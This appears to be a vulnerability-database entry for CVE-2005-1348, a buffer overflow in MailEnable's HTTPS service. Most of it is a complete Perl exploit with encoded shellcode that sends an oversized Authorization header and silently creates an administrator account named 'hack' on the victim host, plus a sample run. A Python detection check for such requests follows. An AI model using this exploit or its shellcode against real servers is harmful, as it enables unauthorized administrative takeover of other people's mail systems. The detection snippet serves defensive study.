MailEnable HTTPS Buffer Overflow Vulnerability
Vulnerability ID | 1108706 | Vulnerability type | Buffer overflow |
Published | 2005-04-25 | Updated | 2005-05-02 |
CVE | CVE-2005-1348 |
CNNVD-ID | CNNVD-200505-200 |
Platform | Windows | CVSS score | 7.5 |
|Vulnerability source
|Vulnerability details
MailEnable mishandles HTTP header options; a remote attacker could exploit this vulnerability to execute arbitrary instructions on the host.
|Exploit (EXP)
#!/usr/bin/perl
# This tool is to be considered for educational purposes only
#
#
#-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-
#-=[ ]=-
#-=[ Discovered & Coded by CorryL info:www.x0n3-h4ck.org]=-
#-=[ irc.xoned.net #x0n3-h4ck corryl80[at]gmail.com]=-
#
#[+]Connecting to 127.0.0.1
#[+]Sending Evil Request
#[+]Creating Administrator User
#Connect to 127.0.0.1 Using User (hack) Pass (hack)
#
#D:\Documents and Settings\Administrator\Desktop\prova bof\mailenable-bug+exploit
#>net users
#
#Account utente per \\SERVER
#
#-------------------------------------------------------------------------------
#__vmware_user__ Administrator ASPNET
#Guest hack IME_ADMIN
#IME_USER IUSR_SERVER IWAM_SERVER
#SUPPORT_388945a0
#Esecuzione comando riuscita.
#
#
#Greatz All Users & Friends on irc.xoned.net #x0n3-h4ck
use IO::Socket;
use Getopt::Std;
$ret = "\x6c\x36\xb7"; # RET for Win2003
$nop = "\x90" x 24;    # NOP sled placed before the payload
# win32_adduser - PASS=hack EXITFUNC=thread USER=hack Size=240 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc7".
"\x7e\x10\xf5\x83\xeb\xfc\xe2\xf4\x3b\x96\x56\xf5\xc7\x7e\x9b\xb0".
"\xfb\xf5\x6c\xf0\xbf\x7f\xff\x7e\x88\x66\x9b\xaa\xe7\x7f\xfb\x16".
"\xe9\x37\x9b\xc1\x4c\x7f\xfe\xc4\x07\xe7\xbc\x71\x07\x0a\x17\x34".
"\x0d\x73\x11\x37\x2c\x8a\x2b\xa1\xe3\x7a\x65\x16\x4c\x21\x34\xf4".
"\x2c\x18\x9b\xf9\x8c\xf5\x4f\xe9\xc6\x95\x9b\xe9\x4c\x7f\xfb\x7c".
"\x9b\x5a\x14\x36\xf6\xbe\x74\x7e\x87\x4e\x95\x35\xbf\x71\x9b\xb5".
"\xcb\xf5\x60\xe9\x6a\xf5\x78\xfd\x2e\x75\x10\xf5\xc7\xf5\x50\xc1".
"\xc2\x02\x10\xf5\xc7\xf5\x78\xc9\x98\x4f\xe6\x95\x91\x95\x1d\x9d".
"\x28\xb0\xf0\x95\xaf\xe6\xee\x7f\xc9\x29\xef\x12\x2f\x90\xef\x0a".
"\x38\x1d\x7d\x91\xe9\x1b\x68\x90\xe7\x51\x73\xd5\xa9\x1b\x64\xd5".
"\xb2\x0d\x75\x87\xe7\x16\x71\x96\xac\x5e\x78\x94\xa4\x15\x30\xda".
"\x86\x3a\x54\xd5\xe1\x58\x30\x9b\xa2\x0a\x30\x99\xa8\x1d\x71\x99".
"\xa0\x0c\x7f\x80\xb7\x5e\x51\x91\xaa\x17\x7e\x9c\xb4\x0a\x62\x94".
"\xb3\x11\x62\x86\xe7\x16\x71\x96\xac\x5e\x3f\xb4\x83\x3a\x10\xf5";
getopts('h:', \%args);
if (defined($args{'h'})) { $host = $args{'h'}; }
print STDERR "\n-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-\n";
print STDERR "-=[ ]=-\n";
print STDERR "-=[ Discovered & Coded by CorryL info:www.x0n3-h4ck.org]=-\n";
print STDERR "-=[ irc.xoned.net #x0n3-h4ck corryl80[at]gmail.com]=-\n\n";
if (!defined($host)) {
    Usage();
}
# Overflow buffer: NOP sled, payload, then the return address
$bof = $nop.$shellcode.$ret;
$ric = "GET / HTTP/1.0\r\n";
$ric2 = "Authorization: $bof\r\n\r\n";  # oversized header value carries the buffer
$richiesta = $ric.$ric2;
print "[+]Connecting to $host\n";
sleep 2;
$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 8080,
                                Proto    => 'tcp');
die "Connection failed: $!\n" unless $socket;
print "[+]Sending Evil Request\n";
sleep 2;
print $socket "$richiesta";
print "[+]Creating Administrator User\n";
print "Connect to $host Using User (hack) Pass (hack)\n";
close($socket);
sub Usage {
    print STDERR "Usage:\n  -h  Victim host.\n\n";
    exit;
}
# milw0rm.com [2005-04-25]
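A defender-side check, added here as an example and not part of the advisory or of the exploit above: it parses a raw HTTP request and flags header values shaped like the overflow the exploit sends (an oversized value, non-printable bytes, a run of 0x90 NOP bytes). The length thresholds and both sample requests are constructed assumptions, not values from the advisory.

```python
import re

# Thresholds are assumptions for this example, not values from the advisory.
MAX_HEADER_VALUE = 512   # legitimate Authorization values are far shorter
NOP_SLED_MIN = 8         # run of 0x90 bytes long enough to suggest a NOP sled


def parse_headers(raw: bytes) -> dict:
    """Split a raw HTTP request into a {name: value} dict of header bytes."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split(b"\r\n")[1:]:   # skip the request line
        if b":" not in line:
            continue
        name, value = line.split(b":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def header_findings(raw: bytes) -> list:
    """Return (header, reason) pairs for header values that look like overflow attempts."""
    findings = []
    for name, value in parse_headers(raw).items():
        label = name.decode("ascii", errors="replace")
        if len(value) > MAX_HEADER_VALUE:
            findings.append((label, f"value length {len(value)} exceeds {MAX_HEADER_VALUE}"))
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append((label, "non-printable bytes in header value"))
        if re.search(rb"\x90{%d,}" % NOP_SLED_MIN, value):
            findings.append((label, "NOP sled (run of 0x90)"))
    return findings


# Constructed sample requests (not captured traffic).
BENIGN = b"GET / HTTP/1.0\r\nAuthorization: Basic YWRtaW46cGFzcw==\r\n\r\n"
# Same shape as the exploit's request: NOP sled, filler bytes, 3-byte return address.
SUSPECT = (b"GET / HTTP/1.0\r\nAuthorization: "
           + b"\x90" * 24 + b"\x41" * 600 + b"\x6c\x36\xb7" + b"\r\n\r\n")

if __name__ == "__main__":
    for tag, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(tag, header_findings(req))
```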
|Affected products
MailEnable MailEnable Professional 1.54
|References
Source: BUGTRAQ
Name: 20050424 MailEnable HTTPS Buffer Overflow [x0n3-h4ck]
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111445834220015&w=2
Source: MISC
Link: http://www.x0n3-h4ck.org/upload/x0n3-h4ck_mailenable_https.pl
Source: OSVDB
Name: 15737
Link: http://www.osvdb.org/15737
Source: SECTRACK
Name: 1013786
Link: http://securitytracker.com/id?1013786